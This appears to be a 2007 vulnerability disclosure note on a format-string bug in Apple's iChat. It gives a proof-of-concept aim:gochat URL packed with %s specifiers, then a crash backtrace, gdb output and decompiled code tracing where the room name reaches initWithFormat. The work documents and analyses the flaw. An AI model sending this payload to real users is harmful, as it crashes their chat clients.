http://projects.info-pull.com/moab/bug-files/MOAB-20-01-2007.html
PoC URL:
aim:gochat?roomname=%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s
Adium will probably try to handle it, I had to move it to the trash
to hand aim:// to iChat.
Thread 0 Crashed:
0 com.apple.CoreFoundation 0x908110dc
_CFStringAppendFormatAndArgumentsAux + 4934
1 com.apple.CoreFoundation 0x9080fc8c
_CFStringCreateWithFormatAndArgumentsAux + 122
2 com.apple.Foundation 0x925e2a5d -[NSPlaceholderString
initWithFormat:locale:arguments:] + 162
3 com.apple.Foundation 0x92604670 -[NSString
initWithFormat:arguments:] + 55
4 com.apple.iChat 0x000da226 0x1000 + 889382
5 com.apple.iChat 0x000bfbb6 0x1000 + 781238
6 libobjc.A.dylib 0x90a57c56 objc_msgSendv + 54
7 com.apple.Foundation 0x925fc43e -[NSInvocation invoke]
+ 932
8 com.apple.Foundation 0x9264974f -[NSConnection
dispatchInvocation:] + 487
9 com.apple.Foundation 0x92694244 _NSHandleDORequest + 394
10 com.apple.Foundation 0x925f2c92 +[NSConnection
doQueuedWork] + 436
11 com.apple.Foundation 0x925f2acd
__NSPortDelegateTickler + 158
12 com.apple.CoreFoundation 0x9082a155 __CFRunLoopDoObservers
+ 342
13 com.apple.CoreFoundation 0x908291f7 CFRunLoopRunSpecific +
827
14 com.apple.CoreFoundation 0x90828eb5 CFRunLoopRunInMode + 61
15 com.apple.HIToolbox 0x92dcdb90
RunCurrentEventLoopInMode + 285
16 com.apple.HIToolbox 0x92dcd1ce ReceiveNextEventCommon
+ 184
17 com.apple.HIToolbox 0x92dcd0ee
BlockUntilNextEventMatchingListInMode + 81
18 com.apple.AppKit 0x9326f465 _DPSNextEvent + 572
19 com.apple.AppKit 0x9326f056 -[NSApplication
nextEventMatchingMask:untilDate:inMode:dequeue:] + 137
20 com.apple.AppKit 0x93268ddb -[NSApplication run] +
512
21 com.apple.AppKit 0x9325cd2f NSApplicationMain + 573
22 com.apple.iChat 0x00002b6e 0x1000 + 7022
23 com.apple.iChat 0x0007e63d 0x1000 + 513597
NSInvocation is invoking:
(gdb) po $edx
<NSInvocation[0x4f5060] selector: service:chat:showError: signature:
NSMethodSignature: types=Vv@:@@@ nargs=5 sizeOfParams=20
returnValueLength=0; >
(gdb) po [$edx target]
Service[AIM]
It passes arg1 along to the function at 0xda1db as well which in turn does:
[[NSString alloc] initWIthFormat: arg1 ...];
I'm digging to make sure there aren't other unsafe uses of arg1 within
the call at the moment.
l64 = [NSBundle mainBundle];
l71 = [l64 localizedStringForKey: @"%@ error:"
value:@""
table:0];
l78 = [... shortName];
l87 = [NSString stringWithFormat: l71, l78]; // comments in the
localization.strings suggest that l78 should be the service name.
And then comes the:
(void) (0xda1db)(l87, arg1, 0, 0, 0, 0)